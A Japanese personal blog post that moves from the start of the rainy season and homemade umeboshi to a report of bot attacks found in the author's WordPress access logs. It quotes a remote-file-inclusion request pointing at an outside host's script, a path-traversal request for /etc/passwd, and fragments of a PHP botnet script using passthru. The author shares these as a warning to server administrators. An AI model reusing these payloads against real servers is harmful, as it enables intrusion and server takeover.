福岡管区気象台は,今日,今年の梅雨入りを発表した。
麦畑の刈り取りもほぼ完了し,今日は旧暦の5月1日というわけで,その日に五月雨(さみだれ)開始なんて,「なんて間がいいんでしょ」,今年は。(笑)
で,横はその実を漬けた自家製の梅干し,もちろん,去年のです。これが,うまいんです。赤紫蘇を絞って,紫飯とか,一緒につけた生姜(紅ショウガ,でも実のところ紫といった方がいい色。)なんぞもいいです。
ところで,間が悪いのが,bot。
一昨日,StatPress Reloadedのログを見ていたら不審なユーザエージェントがありましてね。
<?php$Alertbotphp=(“で始まって,{passthru($cmd);} } ?>で終わるんですが,どうやら,PHPのRFIに関する脆弱性をついて,サーバをNetBot化しようというスクリプトのようです。
StatPress Reloadedのログをエクスポートして改めて見たら,
option=com_myblog&task=http://www.tourgaja.net/www/data/casper.txt?
option=com_myblog&task=../../../../../../../../../../../../../../../etc/passwd%00 に続いて,スクリプトを送っているようです。
こんな表題付きでした。
#################################################### ##[ ]## ##[ casper_kae@yahoo.com ]## ##[ Created by Kiss_Me or Alert ]## ##[ Thanks to mama ]## ##[ Casper_Cell Parijatah srono ]## ##[ ]## ####################################################
http://ja.forums.wordpress.org/topic/4241 で相談したら,サーバ管理者に連絡した方がいいだろうということだったので,昨日ToyParkにメールして,今のところ,回答待ちなんだけど,その後,ググってみたらこんなのがあった。
http://botnetzprovider.de/cnc1.html (魚拓です)
国内の報告はほとんどないようだけど,このブログは本家のせいで国外からのアクセスも結構あるようだから,そのせいかもしれない。
http://todos.xsrv.jp/2patioweb/todos.cgi?mode=view2&f=10&no=110
にも書いたんだけど,PHPのRFIの脆弱性狙いって,結構あるみたいですよね。サーバ管理者は気をつけないとね。
This website uses cookies.